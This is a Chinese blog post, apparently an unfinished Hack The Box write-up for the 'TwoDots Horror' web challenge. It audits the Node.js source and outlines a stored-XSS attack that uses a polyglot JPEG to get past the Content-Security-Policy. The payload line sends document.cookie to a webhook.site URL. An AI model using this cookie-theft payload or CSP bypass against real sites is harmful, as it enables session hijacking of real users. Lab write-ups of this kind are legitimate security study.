HTB-TwoDots-Horror

最新推荐文章于 2024-07-20 23:59:39 发布
最新推荐文章于 2024-07-20 23:59:39 发布
阅读量338 收藏 9
点赞数 9
文章标签: java jvm 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73373164/article/details/136590945
版权

title: HTB-TwoDots_Horror
date: 2023-12-15 20:23:43
categories: HTB
tags: WEB

TwoDots Horror(未完成)

白盒测试

这个代码是node.js写的我们首先查看这个dockerfile发现并没有flag信息

审计一下这些js代码

index.js

const express       = require('express');
const fileUpload    = require('express-fileupload');
const app           = express();
const path          = require('path');
const bodyParser    = require('body-parser');
const cookieParser  = require('cookie-parser');
const nunjucks      = require('nunjucks');
const routes        = require('./routes');
const Database      = require('./database');


const db = new Database('TwoDots-Horror.db');

app.use(bodyParser.json());
app.use(bodyParser.urlencoded({ extended: true }));
app.use(cookieParser());

app.use(fileUpload({ limits: {
		fileSize: 2 * 1024 * 1024 // 2 MB
	},
	abortOnLimit: true
 }));

app.use(function(req, res, next) {
	res.setHeader("Content-Security-Policy", "default-src 'self'; object-src 'none'; style-src 'self' https://fonts.googleapis.com; font-src 'self' https://fonts.gstatic.com;")
	next();
});

nunjucks.configure('views', {
	autoescape: true,
	express: app
});

app.set('views', './views');
app.use('/static', express.static(path.resolve('static')));

app.use(routes(db));

app.all('*', (req, res) => {
	return res.status(404).send({
		message: '404 page not found'
	});
});

(async () => {
	await db.connect();
	await db.migrate();
	app.listen(1337, '0.0.0.0', () => console.log('Listening on port 1337'));
})();

database.js

const sqlite = require('sqlite-async');

class Database {
	constructor(db_file) {
		this.db_file = db_file;
		this.db = undefined;
	}
	
	async connect() {
		this.db = await sqlite.open(this.db_file);
	}

	async migrate() {
		return this.db.exec(`
            DROP TABLE IF EXISTS users;

            CREATE TABLE IF NOT EXISTS users (
                id         INTEGER NOT NULL PRIMARY KEY AUTOINCREMENT,
                username   VARCHAR(255) NOT NULL UNIQUE,
                password   VARCHAR(255) NOT NULL,
                avatar     VARCHAR(255) NOT NULL
            );

            DROP TABLE IF EXISTS posts;

            CREATE TABLE IF NOT EXISTS posts (
                id         INTEGER      NOT NULL PRIMARY KEY AUTOINCREMENT,
                author  VARCHAR(255) NOT NULL,
                content    VARCHAR(255) NOT NULL,
                approved   INTEGER      NOT NULL,
                created_at TIMESTAMP    DEFAULT CURRENT_TIMESTAMP
            );

            INSERT INTO posts (author, approved, content) VALUES ('ColonelAengus', 1, 'Our baby girl is finally crawling for the first time. I just wish it wasn’t on the ceiling.');
            INSERT INTO posts (author, approved, content) VALUES ('windowsXP', 1, 'Keyboard not responding. Press any key to continue.');
            INSERT INTO posts (author, approved, content) VALUES ('unkn0wn', 1, 'There was a picture in my phone of me sleeping. I live alone.');
            INSERT INTO posts (author, approved, content) VALUES ('Scry67', 1, 'The last man on Earth sat alone in a room. There was a knock at the door.');
            INSERT INTO posts (author, approved, content) VALUES ('fluffyponyza', 1, 'Day 312. Internet still not working.');
        `);
	}

	async registerUser(user, pass) {
		return new Promise(async (resolve, reject) => {
			try {
				let stmt = await this.db.prepare('INSERT INTO users (username, password, avatar) VALUES ( ?, ?, "default.jpg")');
				resolve((await stmt.run(user, pass)));
			} catch(e) {
				reject(e);
			}
		});
	}

	async loginUser(user, pass) {
		return new Promise(async (resolve, reject) => {
			try {
				let stmt = await this.db.prepare('SELECT username FROM users WHERE username = ? and password = ?');
				resolve(await stmt.get(user, pass));
			} catch(e) {
				reject(e);
			}
		});
	}

	async getUser(user) {
		return new Promise(async (resolve, reject) => {
			try {
				let stmt = await this.db.prepare('SELECT * FROM users WHERE username = ?');
				resolve(await stmt.get(user));
			} catch(e) {
				reject(e);
			}
		});
	}

	async checkUser(user) {
		return new Promise(async (resolve, reject) => {
			try {
				let stmt = await this.db.prepare('SELECT username FROM users WHERE username = ?');
				let row = await stmt.get(user);
				resolve(row !== undefined);
			} catch(e) {
				reject(e);
			}
		});
	}

	async updateAvatar(user, avatar) {
		return new Promise(async (resolve, reject) => {
			try {
				let stmt = await this.db.prepare('UPDATE users SET avatar = ? WHERE username = ?');
				resolve(await stmt.run(avatar, user));
			} catch(e) {
				reject(e);
			}
		});
	}

	async addPost(author, content) {
		return new Promise(async (resolve, reject) => {
			try {
				let stmt = await this.db.prepare('INSERT INTO posts (author, content, approved) VALUES (? , ?, 0)');
				resolve(await stmt.run(author, content));
			} catch(e) {
				reject(e);
			}
		});
	}

	async getPosts(approved=1) {
		return new Promise(async (resolve, reject) => {
			try {
				let stmt = await this.db.prepare('SELECT * FROM posts WHERE approved = ?');
				resolve(await stmt.all(approved));
			} catch(e) {
				reject(e);
			}
		});
	}
}

module.exports = Database;

这个数据库语法使用了预处理无法造成常规sql注入

bot.js

const puppeteer = require('puppeteer');

const browser_options = {
	headless: true,
	args: [
		'--no-sandbox',
		'--disable-background-networking',
		'--disable-default-apps',
		'--disable-extensions',
		'--disable-gpu',
		'--disable-sync',
		'--disable-translate',
		'--hide-scrollbars',
		'--metrics-recording-only',
		'--mute-audio',
		'--no-first-run',
		'--safebrowsing-disable-auto-update'
	]
};

const cookies = [{
    'name': 'flag',
    'value': 'HTB{f4k3_fl4g_f0r_t3st1ng}'
}];

async function purgeData(db){
	const browser = await puppeteer.launch(browser_options);
	const page = await browser.newPage();

	await page.goto('http://127.0.0.1:1337/');
	await page.setCookie(...cookies);

	await page.goto('http://127.0.0.1:1337/review', {
		waitUntil: 'networkidle2'
	});

	await browser.close();
	await db.migrate();
};

module.exports = { purgeData };

这里存在了flag放进了cookies

routes/index.js

const fs             = require('fs');
const bot            = require('../bot');
const path           = require('path');
const express        = require('express');
const router         = express.Router();
const JWTHelper      = require('../helpers/JWTHelper');
const UploadHelper   = require('../helpers/UploadHelper')
const AuthMiddleware = require('../middleware/AuthMiddleware');


let db;

const response = data => ({ message: data });

router.get('/', (req, res) => {
	return res.render('index.html');
});

router.post('/api/register', async (req, res) => {
	const { username, password } = req.body;

	if (username && password) {
		return db.checkUser(username)
			.then(user => {
				if (user) return res.status(401).send(response('User already registered!'));
				return db.registerUser(username, password)
					.then(()  => res.send(response('User registered successfully!')))
			})
			.catch(() => res.send(response('Something went wrong!')));
	}
	return res.status(401).send(response('Please fill out all the required fields!'));
});

router.post('/api/login', async (req, res) => {
	const { username, password } = req.body;

	if (username && password) {
		return db.loginUser(username, password)
			.then(user => {
				let token = JWTHelper.sign({ username: user.username });
				res.cookie('session', token, { maxAge: 3600000 });
				return res.send(response('User authenticated successfully!'));
			})
			.catch(() => res.status(403).send(response('Invalid username or password!')));
	}
	return res.status(500).send(response('Missing parameters!'));
});

router.get('/feed', AuthMiddleware, async (req, res, next) => {
	return db.getUser(req.data.username)
		.then(user => {
			if(user === undefined) return res.redirect('/');
			return db.getPosts()
				.then(feed => {
					res.render('feed.html', { feed });
				})
		})
		.catch(() => res.status(500).send(response('Something went wrong!')));
});

router.get('/profile', AuthMiddleware, async (req, res, next) => {
	return db.getUser(req.data.username)
		.then(user => {
			if(user === undefined) return res.redirect('/');
			res.render('profile.html', { user });
		})
		.catch(() => res.status(500).send(response('Something went wrong!')));
});

router.get('/review', async (req, res, next) => {
	if(req.ip != '127.0.0.1') return res.redirect('/');

	return db.getPosts(0)
		.then(feed => {
			res.render('review.html', { feed });
		})
		.catch(() => res.status(500).send(response('Something went wrong!')));
});

router.post('/api/submit', AuthMiddleware, async (req, res) => {
	return db.getUser(req.data.username)
		.then(user => {
			if (user === undefined) return res.redirect('/'); 
			const { content } = req.body;
			if(content){
				twoDots = content.match(/\./g);
				if(twoDots == null || twoDots.length != 2){
					return res.status(403).send(response('Your story must contain two sentences! We call it TwoDots Horror!'));
				}
				return db.addPost(user.username, content)
					.then(() => {
						bot.purgeData(db);
						res.send(response('Your submission is awaiting approval by Admin!'));
					});
			}
			return res.status(403).send(response('Please write your story first!'));
		})
		.catch(() => res.status(500).send(response('Something went wrong!')));
});

router.post('/api/upload', AuthMiddleware, async (req, res) => {
	return db.getUser(req.data.username)
		.then(user => {
			if (user === undefined) return res.redirect('/');
			if (!req.files) return res.status(400).send(response('No files were uploaded.'));
			return UploadHelper.uploadImage(req.files.avatarFile)
				.then(filename => {
					return db.updateAvatar(user.username,filename)
						.then(()  => {
							res.send(response('Image uploaded successfully!'));
							if(user.avatar != 'default.jpg') 
								fs.unlinkSync(path.join(__dirname, '/../uploads',user.avatar)); // remove old avatar
						})
				})
		})
		.catch(err => res.status(500).send(response(err.message)));
});

router.get('/api/avatar/:username', async (req, res) => {
	return db.getUser(req.params.username)
		.then(user => {
			if (user === undefined) return res.status(404).send(response('user does not exist!'));
			avatar = path.join(__dirname, '/../uploads', user.avatar);
			return res.sendFile(avatar);
		})
		.catch(() => res.status(500).send(response('Something went wrong!')));
});

router.get('/logout', (req, res) => {
	res.clearCookie('session');
	return res.redirect('/');
});

module.exports = database => { 
	db = database;
	return router;
};

这个是记录路由的地方

并且上面还引用了我们需要的

const bot            = require('../bot');

在代码93行调用了

bot.purgeData(db);

现在我们就是要利用

router.get('/api/avatar/:username', async (req, res) => {
	return db.getUser(req.params.username)
		.then(user => {
			if (user === undefined) return

加上前端代码的

</p>
                        <p>{{ post.content|safe }}</p>
                    </div>

来达到获取cookie但是因为这个blog利用了csp

Content-Security-Policy: "default-src 'self'; object-src 'none'; style-src 'self' https://fonts.googleapis.com; font-src 'self' https://fonts.gstatic.com;"

然后

if(twoDots == null || twoDots.length != 2){
	return res.status(403).send(response('Your story must contain two sentences! We call it TwoDots Horror!'));
}

要求你必须要写两个段落也就是两个点

<script src="/api/avatar/test"></script>1.1.

写成这样就可以了

在利用upload来上传我们需要的payload

参考链接

https://portswigger.net/research/bypassing-csp-using-polyglot-jpegs

这里接收cookie的用的是webhook

*/=document.location.href="https://webhook.site/72ad2f9e-7a81-4b01-d3ed-8290387f7d0b?"+document.cookie;/*

内容加进图片并且要不小于120x120

这里我使用的软件是

img_polygloter.py

然后不知道为什么我就得不到cookie

c0iq
关注
  • 9
    点赞
  • 9
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
htb-beep
m0_55772907的博客
09-15 911
一般
HTB-Solutions
03-09
【标题】"HTB-Solutions" 提供的内容可能与网络安全平台 Hack The Box(HTB)有关,这通常指的是用户在该平台上完成的各种挑战的解决方案集。Hack The Box 是一个在线平台,让网络安全爱好者和专业人士可以通过解决...
nodejs学习(9)nunjucks模板引擎
mapbar_front的博客
07-05 2964
1、模板引擎最常用的场景是输出网页,我们架构起一定的模板,配合传入的数据,模板的结构不变,但数据会改变。 2、nodejs中,集成了一个nunjucks的环境,在使用的时候引入nunjucks模块就好。nunjucks提供了一个基本的模板语法。{% extends base.html %}{% block header %} <h1>{{title}}</h1> {% endblock %}{%
nodejs 模板引擎nunjucks使用
qq_34870529的博客
10-14 376
使用nunjucks实现登录功能 1、server.js const Koa = require("koa"); const nunjucks = require("nunjucks"); const views = require("koa-views"); const Router = require('koa-router'); const parser = require('koa-parser'); const app = new Koa(); const router = new R
nodejs之koa配置nunjucks中间件
SunnyDai2016的博客
09-12 459
const Koa = require("koa"); const nunjucks = require("koa-nunjucks-2"); let mKoa = new Koa(); mKoa.use(nunjucks({ ext: "html", path: __dirname + "/views", nunjucksConfig: { trimBl...
thinkjs使用Nunjucks模板以及简单的使用方法
热门推荐
土豆的博客
06-01 1万+
Nunjucks 是一个更复杂的 JavaScript 模板引擎,提供丰富的语言特性和块继承、自动转移、宏和异步控制等等。 之前项目一直使用的是art-template模板引擎, 今天在别人的项目中见到使用Nunjucks模板引擎,真的很强大,用过的人都说好! 我们的项目都是thinkjs做的,我这里也用的是thinkjs,引用的内容基本上都是thinks官网的配置方法 首先是样创建
nunjucks简单上手
我是渣渣
12-04 3795
Nunjucks是Mozilla开发的一个纯JavaScript编写的模板引擎,既可以用在Node环境下,又可以运行在浏览器端 安装 npm install nunjucks 使用 渲染字符串 let nunjucks=require('nunjucks'); nunjucks.configure({autoescape: true}); let ret = nunjucks.rende...
HTB-Bastion
2201_75378806的博客
05-15 915
它存储虚拟机(VM)硬盘的内容,其中可能包括磁盘分区,文件系统,文件和文件夹。它是 Libguestfs 项目的一部分,该项目提供用于访问和修改虚拟机 (VM) 磁盘映像的工具。SAM 文件是 Windows 安全基础结构的关键组件,用于系统上的本地身份验证。检查器是一个可以自动检测映像中有关操作系统和磁盘结构的信息的工具。然而,在备份中它们是可以访问的,因为它们没有“使用中”。:指定要访问的虚拟机磁盘映像的路径。在这种情况下,路径指向位于指定目录的VHD(虚拟硬盘)文件。:指定磁盘映像应以只读模式安装。
HTB-Cronos
TA不懒,但还没有添加简介
12-06 495
HTB-Cronos
qos-htb-开源
05-03
qos-htb是您一直在等待的简单带宽管理解决方案,graphix制作了图表,您可以在一秒钟之内查看到底谁在消耗带宽!
xml-HTB-开源
05-02
xml-HTB是用于自动生成bash脚本的工具,该工具可在Linux上设置HTB。 它使用xml配置文件。 它易于使用,具有许多功能:多种深度的类,可配置的叶子,u32和fw过滤器,可同时配置两个输入
my-htb-tools3
03-19
my-htb-tools3
HTB-writeups:此仓库包含HackTheBox的文章
05-01
【标题】"HTB-writeups:此仓库包含HackTheBox的文章" 这个标题表明这是一个与网络安全相关的资源库,特别是关于HackTheBox(HTB)的挑战和机器的解决过程记录。HackTheBox是一个在线平台,允许安全专家和爱好者通过...
在eclipse中导入本地的jar包配置Junit环境步骤(包含Junit中的方法一直标红的解决方法)
最新发布
weixin_70987470的博客
07-20 211
从本地导入Junit
Java内存模型
weixin_44267758的博客
07-19 545
此处的变量不是指java编程中的变量,它包括了实例字段,静态字段和构成数值对象的元素,但不包括局部变量和方法参数。JMM规定所有变量都存储在主内存中。每条线程有自己的工作内存,工作内存中保留了该线程使用到变量的主内存的副本。线程对变量的所有操作都必须在工作内存中进行,不能直接读写主内存的变量,不同的线程间也无法直接访问对方工作内存的变量,线程之间的变量值传递需要通过主内存来完成。
Promise 详解(原理篇)
山重水复疑无路,柳暗花明又一村。
07-20 467
Promise 是一种异步编程的解决方案。在异步操作中,callback 会导致回调地狱的问题,Promise 解决了这个问题。一个 Promise对象有以下三种状态:pending:初始状态,既不是成功,也不是失败状态。:意味着操作成功完成。rejected:意味着操作失败。当 new Promise() 被实例化后,即表示 Promise 进入 pending 初始化状态,准备就绪,等待运行。
JVM-垃圾回收与内存分配
m0_50846237的博客
07-19 735
JVM-垃圾回收与内存分配
java算法day19
TOMOT77的博客
07-20 119
我第一时间想到的方法是遍历二叉树+哈希。哈希用来统计数字出现的次数。之后遍历map收集结果。利用了BST的性质,即BST的中序序列是有序序列。
CVE-2023-4016
08-17
很抱歉,我没有找到与您提到的CVE-2023-4016相关的引用资料。是否有其他问题我可以帮助您解答?<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* *2* [HTB HARD 靶机 Cerberus WriteUp](https://blog.csdn.net/qq_58869808/article/details/129786875)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] - *3* [weblogic漏洞总结 复现(未完)](https://blog.csdn.net/weixin_30558305/article/details/97564170)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT3_1"}}] [.reference_item style="max-width: 50%"] [ .reference_list ]

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值